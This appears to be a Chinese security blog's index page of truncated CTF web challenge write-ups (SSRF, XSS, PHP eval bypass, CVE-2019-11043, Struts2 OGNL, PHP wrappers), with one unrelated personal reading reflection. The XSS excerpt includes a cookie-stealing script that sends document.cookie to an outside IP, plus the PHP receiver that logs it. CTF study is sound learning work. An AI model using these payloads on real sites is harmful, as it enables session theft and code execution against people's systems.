hacker
未读web 334 大小写特性1234567891011121314// user.jsmodule.exports = { items: [ {username: 'CTFSHOW', password: '123456'} ]};// login.jsvar findUser = function(name, password){ return users.find(function(item){ return name!=='CTFSHOW' && item.username === name.toUpperCase() && item.password === password; });};
账密
1CTFSHOw / 123456
web 335 函数利用函数利用
12345678require('child_process').execSync('ls ...
hacker
未读SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
web 3511234567891011121314`<?php$url=$_POST['url']; $ch=curl_init($url);//curl_init — 初始化 cURL 会话curl_setopt($ch, CURLOPT_HEADER, 0);//CURLOPT_HEADER启用时会将头文件的信息作为数据流输出curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);// URLOPT_RETURNTRANSFER, 将curl_exec()获取的信息以文件流的形式返回,而不是直接输出$result=curl_exec($ch); //curl_exec — 执行 cURL 会话curl_close($ch); //curl_clos ...
hacker
未读参考文献跨站脚本攻击XSS(最全最细致的靶场实战)_xss靶场-CSDN博客
XSS Platform
web 316123456789// a/php<?php$content = $_GET[1];if(isset($content)){ file_put_contents('tmp/flag.txt',$content);}else{ echo 'no input';}?>
记得给权限 chmod -R 777 ./tmp不然写不进去
12//h1xa<script>document.location.href='http://156.238.233.102/xss/a.php?1='+document.cookie</script>
网页跳转
web 317过滤了 <script>用 <img> 试试
1<img src="" onerror=locatio ...
hacker
未读web 311CVE-2019-11043Response => X-Powered-By: PHP/7.1.33devCVE-2019-11043
CVE-2019-11043漏洞是PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行
普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间
golang使用网上公开的 POC phuip-fpizdam
1234567sudo apt install golanggit clone https://github.com/neex/phuip-fpizdam.gitcd phuip-fpizdam//go env -w GOPROXY=https://goproxy.cngo get -v && go build
运行脚本1234567891011go run . "http://...../index.p ...
hacker
未读vulhub/struts2/github源码
OGNL
OGNL(Object Graph Navigation Language)是一种用于 Java 的表达式语言,它提供了一种方法来访问和操作对象图。OGNL 通常用于 Web 应用程序中,例如在 Struts 框架中,用于从 JavaBean 或对象中获取和设置属性值。
Object-Graph Navigation Language它是一种功能强大的表达式语言(Expression Language,简称为 EL),通过它简单一致的表达式语法,可以存取对象的任意属性,调用对象的方法,遍历整个对象的结构图,实现字段类型转化等功能。它使用相同的表达式去存取对象的属性。
OGNL 三要素:1、表达式(Expression)
表达式是整个 OGNL 的核心,所有的 OGNL 操作都是针对表达式的解析后进行的。表达式会规定此次 OGNL 操作到底要干什么。我们可以看到,在上面的测试中,name、department.name 等都是表达式,表示取 name 或者 department 中的 name 的值。OGN ...
hacker
未读web 25412345678910111213141516171819202122232425262728293031323334353637383940<?phpinclude('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this->username===$u&&$this->password===$p){ $this->isVip=true; } return $this- ...
hacker
未读web 29通配符绕过
题目
123$c = $_GET['c'];if(!preg_match("/flag/i", $c)){ eval($c);
preg_match :匹配正则表达式 模式分隔符后的”i”标记这是一个大小写不敏感的搜索 模式中的\b标记一个单词边界,所以只有独立的单词会被匹配,如:
123if (preg_match("/\\bweb\\b/i", "web")) :Trueif (preg_match("/\\bweb\\b/i", "website")) :False
小技巧:如果仅仅想要检查某个字符串是否包含另外一个字符串,不要使用 preg_match() , 使用 strpos() 会更快。 payload: (这里利用tac命令 同时记得加分号; )
1../?c=system('tac f*');
web 30题目
123456$c = $_GET['c'];if(!pr ...
晚上作为读者, 看书之后大脑里的部分思绪(或者想法),以此记录
此文为信狐狸变作公子身, 灯夜乐游春“纯文笔”
“欸 好啊”
以为是短篇小说
……
看完却无法平复心情
好干净的语言 好平和的内心呐
真切看到了一个干净纯粹的生命
这才是我最喜欢的文字
字里行间的是诗意
忽而又有似曾相识的感觉
好像许久之前我也是这样的人吧, 什么时候开始, 我写不出心里的感觉了..也没有试着去写过了
因为没人看吧
“自己也不在乎自己的想法吗?”
那不能, 对于不开心的事情自然会有不舒服的感觉吧
“感受和想法已经分不清呢”
不知道
从这里惊奇发现的种种, 仿佛自己早已经失去了
“你不做自己 很久了”
自从放下手中笔, 太久太久没有感受到如此的交流
那种不等待回应的交流
和文字本身的交流
(电子输入太扼杀文字啦, 不然我也不会存那么多表情包qwq)
我终于感到也许是太多人急于表达他们自己心中”理想”的自我
每每听到”我这个人..””我一般..””我其实..反而….”诸如此类的话语 , 按着我的头听ta定义 (或者解读?) 其自身是一个如何复杂神秘的大人物时, 往往让我感到悲伤又烦闷
需要正确, 这是庸俗人的标 ...
0x01 伪协议
PHP伪协议,也称为PHP流包装器,是一种在PHP中用于访问各种数据源的机制。这些数据源可以是本地文件系统、远程文件系统、PHP代码、压缩文件等。PHP伪协议允许开发者以统一的方式处理这些不同的数据源。
以下默认为: include $_GET[‘file’] , 且/?file=
1 ) file: //用于访问本地文件系统
1file://../../../../flag.php
2 ) http(s): //用于访问HTTP或HTTPS的URL
1http://www.CH0ico.fun/index.html
3 ) ftp: //用于访问FTP服务器
1ftp://ftp.example.com/pub/flag.txt
4 ) phar: //用于访问PHP归档文件(Phar)
1phar://../../../choco.phar
5 ) data: //用于将文本或base64编码的数据作为字符串流访问
data 伪协议是一 ...
RE_起点
0x01 Reversing-x64Elf-100exeinfo 64 位 ELF 文件,无壳
IDA 分析有 main 函数 , 跟进 (反编译)
1234567891011121314151617181920__int64 __fastcall main(int a1, char **a2, char **a3){ char s[264]; // [rsp+0h] [rbp-110h] BYREF unsigned __int64 v5; // [rsp+108h] [rbp-8h] v5 = __readfsqword(0x28u); printf("Enter the password: "); if ( !fgets(s, 255, stdin) ) return 0LL; if ( (unsigned int)sub_4006FD(s) ) { puts("Incorrect password!"); return 1LL; } else { ...